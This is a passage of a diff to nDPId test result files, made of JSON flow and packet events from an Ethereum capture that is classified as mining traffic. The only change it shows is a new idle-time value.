="} 
00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1578508364694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAAF02BFAADcR2Y8iYawWwKgBuHZfdl8BYBsKk2vVIKFBe5srt6TuKGLoSQyIYHTHTIh8E6CjfYCc9i8bqGNRb1RdySNn+Iv9WrBeYgM40YLK2f29HLFDjWvrLH5PzXOrZjlyFrfNSw\/LgHRZLq7JZkTKJJivek9A0KFTAQT49Pjt+E2EWSTXC4J2YYJ2YbhAKsm6hrEBgceppDA8y6y8ToI4LATCvXtK2lH6G5Ea4z\/xJThSCDAuG5MSvtPStPEkcnXcb7SOx0jpL4DMcyqusPhNhJ+KPreCdl+Cdl+4QFFks1Hi1w5Dzl6eTycY4XMH5jgPi\/IsM\/Xh\/aiCTq6KUBnNNvsH2QEEcq8Eurha1gzN35pyz9iUxxW+rcV0tUj4TYTPtOCBgg09gg09uEBD39Z7PE\/miF\/gBzQtLgOKuJmlQiP1\/EPNHjqCw\/jys2eg7dySq1uz5KP5CQPL3LPisAyyzl2cNiKWtBUo4PgQhF4WIGA="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1578508364697,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364697,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHkfoAAEARTtTAqAG4NiSg03Zfdl8As+iZ15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} 00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364714,"flow_last_seen":1578508364714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364714,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1578508364714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSM3AqAG4UpHc+d05dl+ffKVSAAAAALAC\/\/\/0ywAAAgQFtAEDAwUBAQgKItiVBQAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1578508364717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364717,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMGVBhoKtkZwKgBuHZf3SMhYrdg7BRmI6AS\/ohxlQAAAgQFoAQCCAru0q\/IItiUTwEDAwc="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1578508364717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364717,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNyDAqAG4aCrZGd0jdl\/sFGYjIWK3YYAQEAmOFAAAAQEICiLYlQju0q\/I"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364714,"flow_last_seen":1578508364714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364714,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1578508364714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSM3AqAG4UpHc+d05dl+ffKVSAAAAALAC\/\/\/0ywAAAgQFtAEDAwUBAQgKItiVBQAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1578508364717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364717,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMGVBhoKtkZwKgBuHZf3SMhYrdg7BRmI6AS\/ohxlQAAAgQFoAQCCAru0q\/IItiUTwEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1578508364717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364717,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNyDAqAG4aCrZGd0jdl\/sFGYjIWK3YYAQEAmOFAAAAQEICiLYlQju0q\/I"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1578508364729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7gO1AADART9iAADOMwKgBuHZfdl8EJxcg9PffAeslidE0A2XYKUWPfQSrSzELT24RQsZMkDFAUC\/8t71UobxaKgVF9YFxtOS9Li4RLrxMDnrT4k5PGgw2NDHZtKrKg8J\/d2YlScEj\/YBR+sG3bhx8yqSCwFLu+QmtAQT5A7r5A7L4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2ETi\/CnoJ2X4J2X7hA+Q4zg2oOekCIJoV1y\/ualFI8sA2WiSVXjBsUf\/fkEaUBa4ucL3qlgbfTJJpR6RtQSjEN0kW4Om6HGzu56xhcP\/hNhF6CJvWCdl+Cdl+4QCa0AdVA2\/h5KxbzG7wSXhKLcgLDQf3VZM6j4pcDpEr22I0w8vjr3eeZrANzqy+B0k7Jw6sj9qOYOkYu9v1\/HcL4S4QXZGXDgsVFgLhA4dMHiHESZvaZv5XwOSEg7GIAhtTuq\/1+kuZamW7NEWy5Mx7jYjqriPSY+yi8MCrIJ809xx8ts8E05ybrI5RK9vhNhHTKaT+Cdl+Cdl+4QNscTNh1YzVnvcLB2a2lU2bz3gyaTlXXbE+pFLDVoDdFI5ADpod42cruH9wQt79YZLxlJa01FygTlV6X9wnzbsb4TYRSpWAfgnZhgnZhuECxFAegsyOgyfrql\/zztxCELDSekbbhUJf21H8iSNiW9cKP2xirrTz8RKLVHxNA2LkFNcMF8l9m+GUUJJ3wo0ve+E2EZ\/
0rzIJ2X4J2X7hA0+1Q\/zfDwmqiJ4L7\/yvPXaADca3\/aoKeqi6XasejIDSTPmS2ILmdZ2LgwWGNQRAtsR66VqR5PIUppHE6JTXzu\/hNhC9aDGqCdl+Cdl+4QEWucUJTr5uswusybUrNZinvmACa+spHP3M8Ca80aMiKTDP2An9QqqbsJgkcvDnFqQSdwmVB0j3FFWWOWXchmBH4TYQ03B+BglLcglLcuEC4ECYNzxwi2kJoJQjyJ6lUniuRlC+UndNWqAZRufW0X533Ymm1WtW8x0w\/1eGqPwGeOGNfU57w7mmrZv5S0MuC+E2EoBCKUoJ2X4J2X7hA7pvrsi4uzujUwcCnzbOXM3k+PSTxp6vSaGlZ+vjNNS2DLnFg12pt76j1a3+aMxZ2sjeuJ4ACTqyhbBihj1yObfhNhLB96meCdl+Cdl+4QMGwHxHg22IaagGZCrHWyox4ceWSrkz5+TUJ7FvSKEAsyUrKnBQ1BKg4U4OyDXv653Ump5Su2Klg\/PAjth\/4FVX4TYQDCFzcgnZfgnZfuEAOe5LjgOGocDnrwWucrGwohrnh\/PIVvUNi2EPcxA3lL9o2I1kGKrrcltIHdy07g5GmzReWD9IntTCd9ncDRnHuhF4WIGA="} 01011{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1578508364729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFgO5AADARUk2AADOMwKgBuHZfdl8BsUbFE+HTPyEyomNSay73CyfrLD8rHnhX7vxj92G3He3rB8i3yggvxA3gI120fMxC8T5NSVg69zUML0xXdXDn6x+i1UJlYzm2ZsL8HkXRcVxsD7\/Cz8uc2cDeR5GmI31rs3BBAAT5AUT5ATz4TYRWzyr3gnZfgnZfuEAwPG4npPFCKterF6wXX6hmKDtHpPLV5Gpyh4HRvQlb1WOtMBiFa5iB1p48IlU7yQzlUhHlEKU2TAWk+UxWCOtE+E2EwKkGMYJ2X4J2X7hAXDWjwnntCdEfY7ZsbIcma6dZim0sS\/6AZlg+cBMsOylaupmT4K85DC7A88jAAB9\/AkNP7Q7FRuWOzTw655z20fhNhF\/YD6SCdl+Cdl+4QMhe7o3oH5yNMBpAbg7BFfLQiRhzAx0IcRlGupvV\/Zui89t4l4x5tGAZhBv4cgNKbiHVFqGfCeCtDh7KA5ZNUtn4TYQ2yX4zgnZfgnZfuEBWXo894U5qji3Sd9oPTupJEBwpi5JkOWop7uGO9PMehSCnS4eHg4+tauk7NJIwG19teeCjKxS93DtycMhLIWGEhF4WIGA="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1578508364732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364732,"pkt":"EBMx8Tl2KDc3AG3ICABFAACccxcAAEAR1EDAqAG4b+UAtHZfTtYAiDTvS0gyrIvyYAXql+rzEz+AR\/cLOiJor5McpZ3aQTzvVtbxvdlPVHOvm8x2T63kxRajQJXVXM7hf79y1fQG9XWokxXgcqkKLlUPoIFVVYrTntTkZjbBJdoltYqy5v2xN8\/CAAHdBMuEfwAAAYJ2X4J2X8mEb+UAtIJO1oCEXhYgYAU="} 00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1578508364751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364751,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGCIIzJlG0wKgBuHZf3ThkB68VWi0AlqAScSALcgAAAgQFrAQCCAqBHInXItiU5gEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1578508364751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364751,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG84nAqAG4MyZRtN04dl9aLQCWZAevFoAQECya6gAAAQEICiLYlSaBHInX"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1578508364751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364751,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGCIIzJlG0wKgBuHZf3ThkB68VWi0AlqAScSALcgAAAgQFrAQCCAqBHInXItiU5gEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1578508364751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364751,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG84nAqAG4MyZRtN04dl9aLQCWZAevFoAQECya6gAAAQEICiLYlSaBHInX"} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
01977{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1578508364773,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGASMuzZAAC8R8ro2JKDTwKgBuHZfdl8EeHOhfS8\/VKeU4xriCeJZNmbyiR29m3N42\/uIKvLbiJlgdyaSwrO2BgcDcenrD2C97edthDBouwifboHgE3u3hLHcQi8I2aNx02z5+NzOkszQMNgplhV2V\/wYwtE8G8IvYQ3cAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2E0WGPAYLDUILDULhAQhNvCoDxAncltx4bh9WffZwzBdE\/9xF06wXJo57MMUhoLLSI90CIePrV\/tYmYiKEiyDSrJDYOlCFHmZ3pqDCwfhNhGoMJ6iCdn2Cdn24QH6QBf7Np\/9Y+eiOrugFzIsIhVcNcp\/OYct+34QkqEfvlXbuNfWnoEs1IzwGORRl6zR7xwwZW1+45dnGnJxxFET4TYTAnuIugnZfgnZfuECuDYcQjm3wJMglum1qnPXPBozHysGZ9VxiaJNnx\/kw7dAhqZoxI6CdfBdLdPaGhgI412g7XwrxymiHNjtEpybV+E2Eb+UAtIJO1oJO1rhA0poa9\/bt4+0jT09hYxZaiqxOAEVZVX85K1bHaaj2apLnzPtOIrzfKJurvUFlKLQJKx6TBvhnKvyePnNB3SaoJvhNhKSEZZ+Cdl+Cdl+4QGhplCUf+0AxOYQ0\/JiK92IrqpcWVPF77+npw8uqJp6XsPoEUGJFdkdpzDehQ5oaTj67fZbU0xSOgleTToHaYQj4TYSygMxlgsNQgsNQuEAJaLOKzWf\/o+pIN3tGz2TU0Jj7rRUsEu\/g\/J\/izFMRqT2L21hSkEIu4pwcRIudbxWCEi7R3jpR3Qx72SJ7sDxL+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhNFhtVyCw1CCw1C4QGNRrcySTkrIddsTkghzBE5yaZovlz823kaODYnxRULrhcdtfhDSmheK1rkdzx6MLgmWRkcqk5yLSRXbV7Sa9hv4TYSUZnN9gnQ9gnQ9uECK3QCjct4kYgqQwECFpzDV6FidxjszhMNuNu5KPckeHeVnNGRrmrvdWVqSm7NdhSk\/GBSTMV30P4Rv7pq1hSjo+E2ENL1ESYILzYILzbhAFgxun0r0zdyAC5SZb67xXu\/2hxGmSEaQZz1XosQe6902lrVgE71jlymkTkVmiGnjo+wcj5gGrpBHOVgGl5DUX\/hNhFCeJFKCdl+Cdl+4QPL7djWpmmTz8plIeSEj91S2rY+aeiMQAn6m9zZuLcDbcgnpEzw4Bbj2GboSA\/6fD1Ct0nUU6+rf7UzNqpXAqYL4TYRvYnEBgnZfgnZfuED0pW7OSkAUUx9PeHXwwyf7mqpd70LmGPSseSc9VRhmuql9pusBMDKDEfCCcSaAIW2BnfDoTpS113ylm2TbVhfWhF4WIGA="} 
00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1578508364773,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGAF0uzdAAC8R9dE2JKDTwKgBuHZfdl8BYMxaEf6gK86OMmqC0hj8YCjT4Kxyd9QhLNhUWv84IcoZEEM5WLaEl0iNjPoH5MGkDBtHCCGzykqH2IyxlA4UZhPcyDumXz\/v4mlSvZfRB2yOu5AYhwCSwbpUWhfp9lpeKanwAQT49Pjt+E2EdbUsoIIrq4Irq7hAjNB3wOfdUkch\/RymD8COogkRfmtGHDZ3JfVp7qPL0g95b9d6Og4eqk7Oc5yCXUjsPCBRZNV\/OEkCcWVLTRMhqvhNhDb\/yRuCdl+Cdl+4QBkaEptJyzZcwNghsa\/yev+qS1D63n8u0YIQqdir49AX7Q7OxcqumEYHw1gpXkn8\/0NtWmRXiIMnyNsmLKeGv434TYQj3LNggnZggnZguEA4nJBTYkTqav4+upLVWlu+s2ggu8pFBH5psWcuz5eAhJOcvW7tSncGp+spv2HIMW\/j4SK81taE+f1zSPKQGx8uhF4WIGA="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1578508364776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364776,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc6zkAAEARbFTAqAG40WGPAXZfw1AAiAuoYX\/X5Uw4lffkPNHSCMW6SrDFB88ojJJssa\/u4MiJ7ftgjBcFdVPuw+tvNym45804Q6\/uLh0oQsOr0riQp0FxmC7+mATc88CsFLix8wyPMseFlTK290MHGwkPORWZli5hAQHdBMuEfwAAAYJ2X4J2X8mE0WGPAYLDUICEXhYgYAU="} 00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1578508364784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364784,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGswg056VswKgBuHZf3SosjczmxQv4NKAS\/ohsIgAAAgQFoAQCCApgPx7\/ItiUTwEDAwc="} 
